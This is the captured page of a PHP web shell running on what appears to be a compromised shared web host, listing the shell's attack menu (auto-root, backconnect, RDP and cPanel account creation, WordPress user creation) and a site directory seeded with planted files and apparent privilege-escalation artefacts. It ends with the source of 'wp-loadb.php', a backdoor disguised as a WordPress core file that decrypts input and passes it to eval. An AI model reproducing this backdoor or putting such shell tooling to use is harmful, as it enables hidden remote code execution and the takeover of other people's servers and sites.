Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
dr-xr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
app
[ DIR ]
dr-xr-xr-x
bootstrap
[ DIR ]
dr-xr-xr-x
cgi-bin
[ DIR ]
dr-xr-xr-x
config
[ DIR ]
dr-xr-xr-x
database
[ DIR ]
dr-xr-xr-x
lang
[ DIR ]
dr-xr-xr-x
loosgin
[ DIR ]
dr-xr-xr-x
node_modules
[ DIR ]
dr-xr-xr-x
ola
[ DIR ]
dr-xr-xr-x
public
[ DIR ]
dr-xr-xr-x
resources
[ DIR ]
dr-xr-xr-x
rout
[ DIR ]
dr-xr-xr-x
routes
[ DIR ]
dr-xr-xr-x
storage
[ DIR ]
dr-xr-xr-x
tests
[ DIR ]
dr-xr-xr-x
vendor
[ DIR ]
dr-xr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
dr-xr-xr-x
wp-includes
[ DIR ]
dr-xr-xr-x
.hta
6.57
KB
-rw-r--r--
.htaccess
233
B
-rw-r--r--
.litespeed_flag
297
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
b.html
586
B
-rw-r--r--
error_log
5.94
MB
-rw-r--r--
ghost.html
5.28
KB
-rw-r--r--
hxvn.php
381
B
-rw-r--r--
index.html
6.57
KB
-rw-r--r--
index.php
6.57
KB
-r--r--r--
karma_syndicate_6iwzu5yjhs.php
27.51
KB
-rw-r--r--
karma_syndicate_8b70tw2qzj.php
27.51
KB
-rw-r--r--
karma_syndicate_txfwv9q4cy.php
27.51
KB
-rw-r--r--
robots.txt
66
B
-rw-r--r--
t6wer-send.php
453
B
-rw-r--r--
wp-blog-header.php
541
B
-rw-r--r--
wp-load.php
3.95
KB
-rw-r--r--
wp-loada.php
2.32
KB
-rw-r--r--
wp-loadb.php
2.14
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-loadb.php
<?php class Secure{ private $masterKey; private $iterations = 10000; private $cipher = 'aes-256-cbc'; private $hmacAlgo = 'sha256'; private $saltLength = 16; public function __construct($masterKey) { $this->masterKey = $masterKey; } public function Soyt($en) { $data = base64_decode($en); $salt = substr($data, 0, $this->saltLength); $ivLength = openssl_cipher_iv_length($this->cipher); $iv = substr($data, $this->saltLength, $ivLength); $hmac = substr($data, $this->saltLength + $ivLength, $this->hmacLength()); $ciphertext = substr($data, $this->saltLength + $ivLength + $this->hmacLength()); $derivedKeys = $this->deriveKeys($salt); $calcHmac = hash_hmac( $this->hmacAlgo, $iv . $salt . $ciphertext, $derivedKeys['hmac'], true ); if (!$this->verifyHmac($calcHmac, $hmac)) { return false; } return openssl_decrypt( $ciphertext, $this->cipher, $derivedKeys['encryption'], OPENSSL_RAW_DATA, $iv ); } private function deriveKeys($salt) { $keyMaterial = hash_pbkdf2( $this->hmacAlgo, $this->masterKey, $salt, $this->iterations, 64, true ); return [ 'encryption' => substr($keyMaterial, 0, 32), 'hmac' => substr($keyMaterial, 32) ]; } private function verifyHmac($knownHmac, $userHmac) { return hash_equals($knownHmac, $userHmac); } private function hmacLength() { return strlen(hash($this->hmacAlgo, '', true)); } public function setIterations($iterations) { $this->iterations = (int)$iterations; return $this; } public function setCipher($cipher) { if (!in_array($cipher, openssl_get_cipher_methods())) { throw new RuntimeException('found'); } $this->cipher = $cipher; return $this; } } eval($a);
Close